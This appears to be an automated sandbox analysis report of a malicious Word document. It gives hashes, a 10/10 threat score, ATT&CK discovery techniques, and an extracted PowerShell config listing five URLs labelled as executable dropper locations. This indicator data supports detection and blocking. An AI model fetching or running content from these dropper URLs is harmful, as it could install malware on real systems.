General

  • Target

    19238030bfa5e60aab5222bad91f9bf06e4c9d1f8504f9d8ac409d9370e291d0.doc

  • Size

    152KB

  • Sample

    200127-j8j9x8y89s

  • MD5

    1ddb0331fd02844e81bd01dccfcbc960

  • SHA1

    0f27a86d6f4087ce36d1120fe9fde99ccc48768d

  • SHA256

    19238030bfa5e60aab5222bad91f9bf06e4c9d1f8504f9d8ac409d9370e291d0

  • SHA512

    236556ebd200c5e9d72d79d1c8ec65be41abdf52120553dcb9fafc0372cb170b66df523e59e98c0ac972c6a42c83eae42f0deef9fa91b35a7c6960bf8630b6a2

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

http://yochina.apps.zeroek.com/assets/GQK9Gly/

exe.dropper

http://www.bandarwinsbobet.com/wp-admin/7bw/

exe.dropper

http://test.pakspaservices.com/wp-content/Yi1j6O7/

exe.dropper

http://portal.meucompromisso.com/wp-admin/kQJ/

exe.dropper

https://wondersofgeorgia.com/wp-admin/jv7hvg/

Targets

    • Target

      19238030bfa5e60aab5222bad91f9bf06e4c9d1f8504f9d8ac409d9370e291d0.doc

    • Size

      152KB

    • MD5

      1ddb0331fd02844e81bd01dccfcbc960

    • SHA1

      0f27a86d6f4087ce36d1120fe9fde99ccc48768d

    • SHA256

      19238030bfa5e60aab5222bad91f9bf06e4c9d1f8504f9d8ac409d9370e291d0

    • SHA512

      236556ebd200c5e9d72d79d1c8ec65be41abdf52120553dcb9fafc0372cb170b66df523e59e98c0ac972c6a42c83eae42f0deef9fa91b35a7c6960bf8630b6a2

    Score
    10/10
    • Process spawned unexpected child process

MITRE ATT&CK Matrix ATT&CK v6

Discovery

Query Registry

2
T1012

System Information Discovery

2
T1082

Tasks